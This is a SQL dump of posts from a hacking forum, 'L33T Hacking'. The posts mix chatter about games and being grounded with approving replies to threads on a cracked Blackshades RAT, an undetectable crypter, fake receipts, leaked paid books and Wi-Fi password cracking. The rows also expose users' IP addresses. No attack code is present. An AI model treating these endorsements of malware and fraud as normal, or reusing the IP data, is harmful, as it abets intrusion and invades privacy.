mybb_posts VALUES('5790', '1001', '5660', '7', 'RE: Shady URL', '0', '3', '??????????¢™', '1350763482', 'LMAO I just did that to my friend and he thought I was sending him some porn.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'd1a99bcbd53d5c6e7b9153420998dd8d', '0', '0'); INSERT INTO mybb_posts VALUES('5791', '1015', '0', '7', 'Grounded', '0', '214', 'Rave™', '1350766905', 'So, heres the story.\r\nI was at paintball and my and my bros ran out of paintballs.\r\nI stole 2000. $50 value\r\nNow I\'m grounded\r\nSorry for the inactivity!', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '21037008387e7bb53a89fba726572e1e', '0', '0'); INSERT INTO mybb_posts VALUES('5792', '1001', '5660', '7', 'RE: Shady URL', '0', '228', 'VirtualLegend', '1350766987', 'Lmao Send it to my Friends', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a0583d42e59be5908ad2b806fa63308d', '0', '0'); INSERT INTO mybb_posts VALUES('5793', '1015', '5791', '7', 'RE: Grounded', '0', '61', 'NXK', '1350767488', 'Damn people still get grounded?\n\nThis is 2012!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd0b28ad22d5b049b5d6e2a64e3dd0e99', '0', '0'); INSERT INTO mybb_posts VALUES('5794', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '61', 'NXK', '1350767565', 'Some leecher probably stole them, Ill check my accounts that i have if they\'re still working and Ill replace them for you.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '918288217a1a2acc9d2a67b20fc9fdfa', '0', '0'); INSERT INTO mybb_posts VALUES('5795', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1350767750', 'Cool pic of a new game I play', '99.253.94.204', '1677549260', '1', '0', '61', '1350767833', '1', '19c25730354d6a22f1a06839cc4ddebc', '0', '1350767833'); INSERT INTO mybb_posts VALUES('5796', '1015', '5791', '7', 'RE: Grounded', '0', '2', 'Apathy', '1350767970', 'Kasual. :o Already knew this.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'b2a673d18b8b2128a4c2988c10929a5c', '0', '0'); INSERT INTO mybb_posts VALUES('5797', '1015', '5791', '7', 'RE: Grounded', '0', '228', 'VirtualLegend', '1350770034', 'Lol Justice :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '33b4b32aa371924e4d26bd11a890fce5', '0', '0'); INSERT INTO mybb_posts VALUES('5798', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '228', 'VirtualLegend', '1350770295', 'I agree with ??????????¢™', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '494f0637a177e944e1bd81a997f488e9', '0', '0'); INSERT INTO mybb_posts VALUES('5799', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '228', 'VirtualLegend', '1350770610', 'First it worked for me because i was one of the first people that have seen the thread, but i didn\'t changed anything. I logged in with the first account and played like 10min. \n\nIt was very nice of Treyz to share his MC accounts, but you need to know that you can\'t trust everyone on the forum.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'bec1a53e5d3dba09bb0bfac6d48816f1', '0', '0'); INSERT INTO mybb_posts VALUES('5800', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '228', 'VirtualLegend', '1350770727', 'Have you ever thought to make money designing graphics ?\n\nCuz your pretty damn good at it', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f3c426716af37e095a68aceb0891f213', '0', '0'); INSERT INTO mybb_posts VALUES('5801', '949', '5339', '72', 'RE: mw3 hack', '0', '228', 'VirtualLegend', '1350770820', 'You know it is possible to post the hole video on the thread?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '17789d4f638fed48e9f42dddadc90dd7', '0', '0'); INSERT INTO mybb_posts VALUES('5802', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '205', 'mothered', '1350770891', 'Congratz to both members on their new roles.\r\n\r\nThanks for all the updates, we should now be well-Informed.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '2e5b3f35f4b8d1d7883ec7f157740dab', '0', '0'); INSERT INTO mybb_posts VALUES('5803', '1009', '5710', '74', 'RE: minecraft server setup tut', '0', '228', 'VirtualLegend', '1350770913', 'Thanks for the tutorial. I Think i need it in the future, to make a LH MC server :p', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2e743c13ed7db655f131ef27b6a8ede4', '0', '0'); INSERT INTO mybb_posts VALUES('5804', '978', '5461', '73', 'RE: IOS vs ANDROID', '0', '228', 'VirtualLegend', '1350770993', 'I like the androids, But the IOS are good too :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7d120a951c875efb94a9991049e9f673', '0', '0'); INSERT INTO mybb_posts VALUES('5805', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '228', 'VirtualLegend', '1350771310', 'Congratz Guys I hope that you will bring this forum to the top', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e9abd023d2bd76a9e8559fa3bc2694b9', '0', '0'); INSERT INTO mybb_posts VALUES('5806', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '205', 'mothered', '1350771623', 'You\'re certainly very active, that\'s for sure.\r\n\r\nNice, yes I have to agree. Helpful, well, I haven\'t seen much of that.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '26589a475e67cb38cf5303328c78e3bc', '0', '0'); INSERT INTO mybb_posts VALUES('5807', '1015', '5791', '7', 'RE: Grounded', '0', '205', 'mothered', '1350771760', 'Thank god I\'m an adult, and make my own decisions.\r\n\r\nIt would suck being grounded. I can\'t stay offline for even 10 minutes, I\'d go nuts.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'be92fde83d67d35e095894d71d62b91f', '0', '0'); INSERT INTO mybb_posts VALUES('5808', '1001', '5690', '7', 'RE: Shady URL', '0', '205', 'mothered', '1350771927', '[quote=\'XTr3ME PiX3L\' pid=\'5690\' dateline=\'1350724696\']\r\nCredits go to Greed aka Ryuniz on UB for sharing this , You need to add credits NOW\r\n[/quote]\r\n\r\nAs mentioned In my Initial post: \"I came across this on another forum, so I don\'t take credit In finding It myself.\"\r\n\r\nOn topic, glad you all like It :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '43226bda250dac221f8ef19cd648b102', '0', '0'); INSERT INTO mybb_posts VALUES('5809', '1016', '0', '7', 'Flying Steps', '0', '205', 'mothered', '1350772539', 'Greetz everyone,\r\n\r\nCheckout the video clip of a dance crew named [b]Flying Steps[/b]. I don\'t believe anyone comes close to them.\r\n\r\nIt\'s only just over 2 minutes, so watch the whole lot. Pay particular attention to the guy at the \"1:15 minute mark\".\r\n\r\n[video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=MlGMoDSPXKA [/video]', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'c8e4f6c72089c93590fd7f87e779a8e8', '0', '0'); INSERT INTO mybb_posts VALUES('5810', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '205', 'mothered', '1350772751', 'I\'ll certainly allocate some time to watch this.\r\n\r\nThanks, appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6e5e50864b2b7e00cc37be391a0b1272', '0', '0'); INSERT INTO mybb_posts VALUES('5811', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '228', 'VirtualLegend', '1350773628', 'Thanks for the great share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7eb32ecea7354a946a82d07911156bdd', '0', '0'); INSERT INTO mybb_posts VALUES('5812', '989', '5544', '68', 'RE: Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '228', 'VirtualLegend', '1350773734', 'Already knew this, but thanks for the share bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b9c99b0260662a60aae10a276fea19a6', '0', '0'); INSERT INTO mybb_posts VALUES('5813', '1013', '5741', '16', 'RE: The Official Magical Book of Free Food', '0', '228', 'VirtualLegend', '1350774003', 'This is really Amazing, Make more of these !!!\n\nAnd can you also do this with Dell or Microsoft, If you can show on a thread how\n\nKeep it up', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd365e8eae9035876ade46a96046e01f1', '0', '0'); INSERT INTO mybb_posts VALUES('5814', '936', '5257', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '228', 'VirtualLegend', '1350774119', 'Looks really great, Gonna check it out later', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '3c11e6bfffe4af19bed995a9aa2b180c', '0', '0'); INSERT INTO mybb_posts VALUES('5815', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '228', 'VirtualLegend', '1350774219', 'This looks really Awesome, but is it still FUD ?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6a038e3362a7e19d7494db0d4191d4d0', '0', '0'); INSERT INTO mybb_posts VALUES('5816', '956', '5385', '75', 'RE: Halo tips,tricks and cheats :O', '0', '228', 'VirtualLegend', '1350774318', 'My opinion: Make your threads more colourful', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6229bc4b7298709ff7e1c41205c42182', '0', '0'); INSERT INTO mybb_posts VALUES('5817', '1000', '5805', '3', 'RE: Congrats NXK and ??????????¢™', '0', '61', 'NXK', '1350774873', '[quote=\'VirtualLegend\' pid=\'5805\' dateline=\'1350771310\']\r\nCongratz Guys I hope that you will bring this forum to the top\r\n[/quote]\r\n\r\nI will try my best.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1f0251532d391397357c92db6011a6cd', '0', '0'); INSERT INTO mybb_posts VALUES('5818', '889', '4842', '3', 'RE: Vote for a new theme', '0', '61', 'NXK', '1350774985', 'I like number 1 and our current theme. But Id love to see change :)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '8ff6d2dac8485ce334966257dd06ee4c', '0', '0'); INSERT INTO mybb_posts VALUES('5819', '1016', '5809', '7', 'RE: Flying Steps', '0', '2', 'Apathy', '1350775311', 'Interesting watch thanks.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'e3ee5e97c6733612d8894e397867eb7a', '0', '0'); INSERT INTO mybb_posts VALUES('5820', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350776407', 'http://eune.leagueoflegends.com/news/inside-design-weaving-spider-queens-web', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '1ff34557137c07c95ed75170d1436ad1', '0', '0'); INSERT INTO mybb_posts VALUES('5821', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '228', 'VirtualLegend', '1350780189', 'I\'m using my computer for hardcore gaming and my laptop for homework.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '18f9770ee9a0a971bc514793c9e77cf8', '0', '0'); INSERT INTO mybb_posts VALUES('5822', '1017', '0', '11', 'Wifi hacking help :O', '0', '257', 'XxTREYZxX', '1350782543', 'Hey L33T, I need some help!\r\nCan some one please give me a step by step tut on how to hack a wifi connection.\r\nIt is a WPA2-PSK Thanks guys \r\nhope i learn how to do it :P', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '74ce0ff28c4ebe92f598b01dade94856', '0', '0'); INSERT INTO mybb_posts VALUES('5823', '936', '5257', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '257', 'XxTREYZxX', '1350782763', 'thanks for the share and keep up the good work ;)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '07a4013b116dd68406286c5517853b44', '0', '0'); INSERT INTO mybb_posts VALUES('5824', '989', '5544', '68', 'RE: Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '257', 'XxTREYZxX', '1350784327', 'thanks for the great share keep up the good work', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '9b46e70d3957a4b462904d92218c9732', '0', '0'); INSERT INTO mybb_posts VALUES('5825', '983', '5794', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '257', 'XxTREYZxX', '1350784760', '[quote=\'NXK\' pid=\'5794\' dateline=\'1350767565\']\r\nSome leecher probably stole them, Ill check my accounts that i have if they\'re still working and Ill replace them for you.\r\n[/quote]\r\n\r\nthats nice of you but i will just do another giveaway :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '65d4ab50519662dee5906af9d7fcea1c', '0', '0'); INSERT INTO mybb_posts VALUES('5826', '1018', '0', '47', 'giving away premium account', '0', '257', 'XxTREYZxX', '1350785225', 'HEY L33T,\r\nWHATS UP AND TODAY I AM GIVING AWAY ANOTHER PREMIUM MY MOTHER BOUGHT FOR ME (I SHOULDN\'T BE DOING THIS LOL) POST BELOW SAYING WHY YOU SHOULD GET THIS ACCOUNT.\r\nYOU CAN DO YOUR OWN LAYOUT FOR EXAMPLE;\r\nNAME:\r\nACT.\r\nACT.\r\nACT \r\nAND SO ONE :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '2b7e8f13441bccddf4c43928886821dc', '0', '0'); INSERT INTO mybb_posts VALUES('5827', '948', '5719', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350788296', '[quote=\'iTzIpod\' pid=\'5719\' dateline=\'1350746029\']\r\nClose it then....\r\n\r\nDon\'t spam with useless posts please.\r\n\r\n\"lol i was just about to close it.\"\r\n\r\nAnd fix your grammar. I don\'t wanna see any LQ posts on a HQ forum. \r\nYou\'re causing all of this..\r\n[/quote]\r\nMy grammar is fine, one capital isn\'t a big deal :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '8fe319207c2f36f2007aaa75f30079d5', '0', '0'); INSERT INTO mybb_posts VALUES('5828', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '3', '??????????¢™', '1350788352', 'Im not a graphics artist but if I was I would have been glad to help you. To me it seems like there is too much space.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'b7b4e3ab0e58e904271692e19537795d', '0', '0'); INSERT INTO mybb_posts VALUES('5830', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350788590', 'I will be closing this thread now to prevent spam :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '79ee697341b3ceafc69fed8c37be5f83', '0', '0'); INSERT INTO mybb_posts VALUES('5831', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '1', 't3h jok3r', '1350789911', 'Don\'t you guys understand that there\'s a reason why this is closed?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '77f2f1582ca5b3fbfedae83f749f0054', '0', '0'); INSERT INTO mybb_posts VALUES('5832', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1350789934', 'Closed because it reached 100 replies.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5b4483e8fe844d9105da82fdb6c16e6b', '0', '0'); INSERT INTO mybb_posts VALUES('5833', '1015', '5791', '7', 'RE: Grounded', '0', '1', 't3h jok3r', '1350790063', 'Lol mothered. I don\'t ever get grounded no matter what the case might be.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '284704fcbcedb0b2468c8245673b61de', '0', '0'); INSERT INTO mybb_posts VALUES('5834', '1002', '5789', '3', 'RE: New mods and forum updates', '0', '1', 't3h jok3r', '1350790108', '[quote=\'??????????¢™\' pid=\'5789\' dateline=\'1350763410\']\r\nI was the one that showed that screenshotted that pic at the end. LOL\r\n[/quote]\r\n\r\nOK I added your name.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0cbcdce78ac4e64e833e5c0fc94a7f25', '0', '0'); INSERT INTO mybb_posts VALUES('5835', '945', '5788', '7', 'RE: I dont want.......', '0', '1', 't3h jok3r', '1350790195', '[quote=\'??????????¢™\' pid=\'5788\' dateline=\'1350763250\']\r\nIts going to be post and PM for a while or Post here and I pm you.\r\n[/quote]\r\n\r\nI would recommend you not to do it \"for a while\" because L33T Hacking is not really a post here and PM me website.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0f2fb286304501d76c829167e5664f0c', '0', '0'); INSERT INTO mybb_posts VALUES('5836', '1019', '0', '3', 'Do you like your new?', '0', '1', 't3h jok3r', '1350797591', 'Yay! Yippee.. Awesome nice edition.\n\nAwards system has finally been added to L33T Hacking but unfortunately there\'s no awards page and I had to manually grant each user an award so I missed out a couple of people that received awards in the starting of LH.\n\nI will post another thread soon about what awards we have and who can grant them.\n\nCheck out our awards help document for more updated information [url=http://l33thacking.net/misc.php?action=help&hid=12]here[/url]', '72.231.24.165', '1223104677', '1', '0', '1', '1350802353', '1', '9f4764fc60e990e2bdb8f99385222436', '0', '1350802353'); INSERT INTO mybb_posts VALUES('5837', '1019', '5836', '3', 'RE: Do you like your new?', '0', '257', 'XxTREYZxX', '1350797666', 'Yes the award system is back.i\'m so happy about this.\ngreat work admin :)', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'e97e7dfcb3ff21bb3112b5466021a080', '0', '0'); INSERT INTO mybb_posts VALUES('5838', '1015', '5791', '7', 'RE: Grounded', '0', '257', 'XxTREYZxX', '1350797804', 'I get grounded but i still play computer under my pillow ahha lol', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '3e68ac9a98e75034d2fa0268a4c91aa7', '0', '0'); INSERT INTO mybb_posts VALUES('5839', '978', '5461', '73', 'RE: IOS vs ANDROID', '0', '257', 'XxTREYZxX', '1350799430', 'thanks guys for all your replies i think android wins with a score of 3-1\nThis Thread has dserved its purpose and i will be closing the thread now :O', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '6290cc3ecfbc370ce19154743c007de7', '0', '0'); INSERT INTO mybb_posts VALUES('5840', '1020', '0', '73', 'How to make your ipod\'s battery 90 percent longer', '0', '257', 'XxTREYZxX', '1350799793', 'hello and i will be telling you how to make your Ipod 90 PERCENT LONGER.\n\nTurn the brightness all the way down. If you don\'t need Internet, turn airplane mode on under settings (makes battery last about 75% longer, and don\'t download anything. Doing all of these will honestly make the battery last about 90% longer.:cool:', '203.104.11.12', '-882373876', '1', '0', '1', '1351653632', '1', '92ee19364d3b9a2e8eb2b33fc307d99e', '0', '1351653632'); INSERT INTO mybb_posts VALUES('5841', '1001', '5808', '7', 'RE: Shady URL', '0', '258', 'PiXEL^OG', '1350799870', '[quote=\'mothered\' pid=\'5808\' dateline=\'1350771927\']\r\n[quote=\'XTr3ME PiX3L\' pid=\'5690\' dateline=\'1350724696\']\r\nCredits go to Greed aka Ryuniz on UB for sharing this , You need to add credits NOW\r\n[/quote]\r\n\r\nAs mentioned In my Initial post: \"I came across this on another forum, so I don\'t take credit In finding It myself.\"\r\n\r\nOn topic, glad you all like It :)\r\n[/quote]\r\n\r\nlol i did not see that , Anyways good post', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '9917f7993746759e591c484bbbfce81c', '0', '0'); INSERT INTO mybb_posts VALUES('5842', '1021', '0', '76', 'rage cheats and tips', '0', '257', 'XxTREYZxX', '1350800076', 'hello here are some accounts :)\r\n\r\nEasy money\r\nIn Subway Town, you can purchase rotating deals from Stew. Sometimes you are able to purchase items at a discount that can immediately be sold at Jani\'s Supplies for a higher price. For example, Stew will sell you Viper Rockets for $66, which you can sell to Jani for $75. Repeat this as much as desired.\r\n\r\nPicking up distant items with a scope\r\nEquip your pistol, and aim at an item with the scope (monocular). As you let go of L2, tap [Pick Up] quickly and repeatedly. If done correctly, you should pick up the item and have it in your inventory. This glitch also works on dead guards. Note: This glitch was done on an unpatched version of the game.\r\n\r\nHidden Doom room\r\nIn the Gearhead Vault, you must interact with seven different computer keyboards in the office where you fight the two Gearhead Bosses. There is no prompt to interact with the keyboards, but you will hear a sound from Doom with each successful activation, and a Doom demon growl sound after all seven are activated. After all seven keyboards have been pressed, go back towards the Gearhead Vault\'s exit (beginning of the level). Open the door, and jump on top of the barrel to your left. Jump on top of the box in front of the door, and crouch to enter. Inside is a platform that will teleport you to the secret Doom room, with a Marine Bobblehead item that can be sold for $150.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'b9bd83275934fbe3602c6876e3eda910', '0', '0'); INSERT INTO mybb_posts VALUES('5843', '1022', '0', '72', 'how to make you pro at sniping MW3', '0', '257', 'XxTREYZxX', '1350800397', 'hello here is the ultimate guide on how to snipe like a pro :O\r\n\r\n[color=#1E90FF] Within MW3, each map has it\'s pros and cons for sniping. Some maps favor snipers by giving them long, open, high traffic areas to sit and pick people off, while others give a few spots to sit and wait for someone to come along. Most times, the maps will provide enough cover that you can conceal yourself, but a few marked on these maps will leave you open. In those areas, I suggest planning an escape route before you decide to use them. Anyways, check out the maps below. I\'ve marked where you can get decent sniping in. Try them out in a private match to familiarize yourself with them, and remember, the best snipers are never seen, never heard, and never in the same spot twice. Think before you snipe. =]\r\n\r\nI\'ve decided to utilize the new Elite HD Maps (which you can find on elite in the \"Improve\" section.) Also, I will place the dlc maps in here for someone to save and work on themselves. (since I won\'t be buying them, therefore I can\'t give any accurate information)\r\n\r\n\r\n - This is just for reference on what means what.\r\n - Arkaden (Not the greatest map for sniping, but there are a few spots)\r\n - Bakaara (Definitely one of the more prominent sniping maps)\r\n - Bootleg (Again, not the best, but there are a few spots)\r\n - Carbon (A decent map for sniping, expect to be killed though)\r\n - Downturn (Big map, lots of rubble, horrible for sniping)\r\n - Fallen (A good choice for snipers, lots of spots and getaway routes)\r\n - Interchange (If you pick the right spot, you can get plenty of kills)\r\n - Lockdown (One of those maps that favors both assault and sniping)\r\n - Mission (This was designed for sniping. Pretty much wherever you go you can snipe)\r\n - Outpost (Lots of long sight-lines, cover, and a bunker! Great for sniping [Thermal works great])\r\n - Resistance (Another decent map, more for the assault class)\r\n - Seatown (Stay to the right side of the map and you can dominate)\r\n - Underground (Probably going to get killed a lot. Not a whole lot of spots, easily flanked) \r\n - Village (As you can see there is a very high traffic area with lots of surrounding sniping positions)\r\n\r\n\r\nYou might be wondering where Dome and Hardhat are. Well I\'ve never sniped there, why would I? They\'re too damn small!\r\nthanks hoped you enjoy.[/color]', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '9dbe7422f2496fcafbd62ee4a39a0f79', '0', '0'); INSERT INTO mybb_posts VALUES('5844', '1023', '0', '4', 'New member here!!', '0', '258', 'PiXEL^OG', '1350800921', 'Some of you may have seen me around as XTr3ME PiX3L but i changed it PiXEL^OG\r\n\r\nAnyways this forum looks really nice and i thought about joining it since everywhere i go i always run into assholes and rude people so i hope there are nice people here :)\r\n\r\nIve basically done it all , all fields in hacking especially Web hacking so i can share my knowledge here. Been in the hacking scene for like 3 years and been learning non-stop ever since!! (i still have a life though lol)\r\n\r\nAnyways nice to meet you all :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'd982774910bec976a1767b03fc5a7215', '0', '0'); INSERT INTO mybb_posts VALUES('5845', '1023', '5844', '4', 'RE: New member here!!', '0', '257', 'XxTREYZxX', '1350801239', 'hey whats up \nwelcome to L33T,\ni used to be XxTREYZxX and now im ????.\nenjoy your stay and please be active:O', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '8f1d5cd7e40587053c025bd0f15ca139', '0', '0'); INSERT INTO mybb_posts VALUES('5846', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '258', 'PiXEL^OG', '1350801791', 'Hay Thanks Mistacode!! :) Really good share', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'faf1eace68ffc1fdd6c2f498df50503b', '0', '0'); INSERT INTO mybb_posts VALUES('5847', '459', '2151', '29', 'RE: Affiliate Marketing [Price: 8$]', '0', '258', 'PiXEL^OG', '1350801984', 'Alright Thank you so much man!!! I hate Sonex he an asshole Thanks for leaking his book +rep added :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'b119971174800c440edcbe3473bcc671', '0', '0'); INSERT INTO mybb_posts VALUES('5848', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '257', 'XxTREYZxX', '1350802060', 'Thanks for the great share bud keep up the good work :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'b5f36b5f241171f917005f112abd98fa', '0', '0'); INSERT INTO mybb_posts VALUES('5849', '459', '2151', '29', 'RE: Affiliate Marketing [Price: 8$]', '0', '257', 'XxTREYZxX', '1350802145', 'thanks for the great share appreciated :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'b95260c53d9c5ebe027e7b1dc390bed7', '0', '0'); INSERT INTO mybb_posts VALUES('5850', '413', '1899', '29', 'RE: EARN $50/HOUR EASILY', '0', '258', 'PiXEL^OG', '1350802165', 'Thanks for this mate , gonna try it :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'a95ac81a775952ebc7942463a2f7c223', '0', '0'); INSERT INTO mybb_posts VALUES('5851', '1023', '5845', '4', 'RE: New member here!!', '0', '258', 'PiXEL^OG', '1350802262', '[quote=\'xEP1C_SC0P3Sx\' pid=\'5845\' dateline=\'1350801239\']\r\nhey whats up \r\nwelcome to L33T,\r\ni used to be XxTREYZxX and now im ????.\r\nenjoy your stay and please be active:O\r\n[/quote]\r\n\r\nYeah ive seen you around UB , Thanks for the welcome :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '152867fba41a59415d0bd2845de386e3', '0', '0'); INSERT INTO mybb_posts VALUES('5852', '1023', '5844', '4', 'RE: New member here!!', '0', '1', 't3h jok3r', '1350802270', 'Welcome to L33T Hacking. Thanks for signing up and helping us keep LH up. We have a lot of nice members around here, we treat each other like family.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '896933a582231f71d6e20504a3cdfd3d', '0', '0'); INSERT INTO mybb_posts VALUES('5853', '1023', '5852', '4', 'RE: New member here!!', '0', '257', 'XxTREYZxX', '1350802454', '[quote=\'t3h jok3r\' pid=\'5852\' dateline=\'1350802270\']\r\nWelcome to L33T Hacking. Thanks for signing up and helping us keep LH up. We have a lot of nice members around here, we treat each other like family.\r\n[/quote]\r\n\r\nyes we do aye joker ahha lol\r\nof course l33T is our home basically :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '4ae79166dd23775837cfdda252e19730', '0', '0'); INSERT INTO mybb_posts VALUES('5854', '413', '1899', '29', 'RE: EARN $50/HOUR EASILY', '0', '257', 'XxTREYZxX', '1350802535', 'Thanks for the great share bud, keep up the good work :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '22cd511ed2a2ea3d1e585fd03b850abe', '0', '0'); INSERT INTO mybb_posts VALUES('5855', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '53', 'sirchamp', '1350805414', 'WAP2 .... You have to bruteforce it. Or se.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '71a77196b0909dcafc41717020041af2', '0', '0'); INSERT INTO mybb_posts VALUES('5856', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '257', 'XxTREYZxX', '1350805796', 'can you please give me a step by step tut on it thanks', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'a85c6791abb8d63445e6c4fb43434458', '0', '0'); INSERT INTO mybb_posts VALUES('5857', '1024', '0', '72', 'mw3 intell locations.', '17', '257', 'XxTREYZxX', '1350809785', 'hey l33T, here are the intell locations \r\n[color=#00BFFF][video=youtube]http://www.youtube.com:80/embed/TUwZckn1Fig[/video]\r\nhope you enjoy all rights go to TUwZckn1Fig :O[/color]', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '16880a3f50d088c5b591b8bc449067d2', '0', '0'); INSERT INTO mybb_posts VALUES('5858', '1025', '0', '72', 'mw3 Black tuesday intell location', '17', '257', 'XxTREYZxX', '1350810091', 'hey here are all the black Tuesday intell locations:\r\n[color=#0000CD]Black Tuesday (5 intel items)\r\n\r\n1. Inside the apartment building, check to the right of the crashed helicopter to find a bedroom. The intel is at the foot of the bed.\r\n\r\n2. Descend the steps leading into the store, then turn around and look for a piece of intel on a desk under the staircase.\r\n\r\n3. As soon as you enter the lobby of the stock exchange, check the left side of the room.\r\n\r\n4. On one of the circular desks in the southwest corner of exchange floor, near the steps leading up.\r\n\r\n5. As soon as your objective is to plant a thermite charge on the jammer, look to the right side of the rooftop for a table with the intel on it. \r\nhope i helped :O[/color]', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '43ab064b31cc8d9a03acdc1499b503f9', '0', '0'); INSERT INTO mybb_posts VALUES('5859', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '53', 'sirchamp', '1350814972', 'Sent you a wpa(2) hacking tut. If it requires to much work you can just buy a wpa(2) hacking service. they cost about 20 dollars if they succed.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '1d3ed0c5454df23418838a3b9b500c73', '0', '0'); INSERT INTO mybb_posts VALUES('5860', '413', '1899', '29', 'RE: EARN $50/HOUR EASILY', '0', '62', 'R?????zo?', '1350819233', 'Thanks gonna try that now :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd478022eb277c3582799851d40ae3de5', '0', '0'); INSERT INTO mybb_posts VALUES('5861', '1023', '5844', '4', 'RE: New member here!!', '0', '62', 'R?????zo?', '1350819394', 'welcome bro, stay active and HQ.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '805ace7083334ef3aa33fe843400092d', '0', '0'); INSERT INTO mybb_posts VALUES('5862', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '62', 'R?????zo?', '1350819477', 'Nice tips, even though I can\'t use airplane mode on my iphone (i know this is for IPOD) but the brightness I might use that :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a0afaf793692db18039ec7326edf1a35', '0', '0'); INSERT 